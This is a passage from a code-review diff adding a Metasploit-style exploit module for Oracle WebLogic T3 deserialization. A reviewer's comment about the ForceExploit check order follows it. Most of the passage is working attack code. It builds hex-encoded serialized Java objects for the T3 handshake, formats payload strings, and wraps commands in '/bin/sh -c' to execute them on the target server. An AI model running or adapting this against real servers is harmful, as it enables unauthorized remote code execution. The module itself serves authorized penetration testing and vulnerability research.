modules/exploits/multi/misc/weblogic_deserialize_badattrval.rb

```diff
@@ -0,0 +1,771 @@
+    request_obj << '7702000078'                           # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
+    request_obj << 'fe00ff'                               # separator
+    request_obj << 'fe010000'
+    request_obj << 'aced0005'                             # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
+    request_obj << '0013'                                 # Class name length: 19
+    request_obj << '7765626c6f6769632e72'                 # weblogic.rjvm.JVMID
+    request_obj << '6a766d2e4a564d4944'
+    request_obj << 'dc49c23ede121e2a'                     # SerialVersionUID
+    request_obj << '0c0000'
+    request_obj << '787077'                               # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
+    request_obj << '4621'
+    request_obj << '000000000000000000'
+    request_obj << '09'                                   # length: 9
+    request_obj << '3132372e302e312e31'                   # 127.0.1.1
+    request_obj << '000b'                                 # length: 11
+    request_obj << '75732d6c2d627265656e'                 # us-l-breens
+    request_obj << '73'
+    request_obj << 'a53caff10000000700'
+    request_obj << '001b59'
+    request_obj << 'ffffffffffffffffffff'
+    request_obj << 'ffffffffffffffffffff'
+    request_obj << 'ffffffff'
+    request_obj << '0078'
+    request_obj << 'fe010000'                             # separator
+    request_obj << 'aced0005'                             # STREAM_MAGIC, STREAM_VERSION
+    request_obj << '7372'                                 # TC_OBJECT, TC_CLASSDESC
+    request_obj << '0013'                                 # Class name length: 19
+    request_obj << '7765626c6f6769632e72'                 # weblogic.rjvm.JVMID
+    request_obj << '6a766d2e4a564d4944'
+    request_obj << 'dc49c23ede121e2a'                     # SerialVersionUID
+    request_obj << '0c0000'
+    request_obj << '787077'                               # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
+    request_obj << '1d0181401281'
+    request_obj << '34bf427600093132372e'
+    request_obj << '302e312e31a53caff1'
+    request_obj << '000000000078'
+
+    new_len = (request_obj.length / 2).to_s(16).rjust(8, '0')
+    request_obj[0, 8] = new_len
+
+    sock.put([request_obj].pack('H*'))
+    sleep(1)
+  end
+
+  def format_payload(payload_cmd)
+    print_status('Formatting payload...')
+    payload_arr = payload_cmd.split(' ', 3)
+
+    formatted_payload = ''
+    payload_arr.each do |part|
+      formatted_payload << '74' # denotes a string
+      formatted_payload << part.length.to_s(16).rjust(4, '0')
+      formatted_payload << part.each_byte.map { |b| b.to_s(16).rjust(2,'0') }.join
+    end
+
+    formatted_payload
+  end
+
+  def execute_command(cmd, opts={})
+    cmd.prepend('/bin/sh -c ')
+    cmd = build_payload_obj(cmd)
+
+    t3_send(cmd)
+  end
+
+  def exploit
+    unless check == CheckCode::Appears || datastore['ForceExploit']
```

Comment:
`ForceExploit` check should come before `check`. Or you can use the `AutoCheck` mixin, if it's applicable.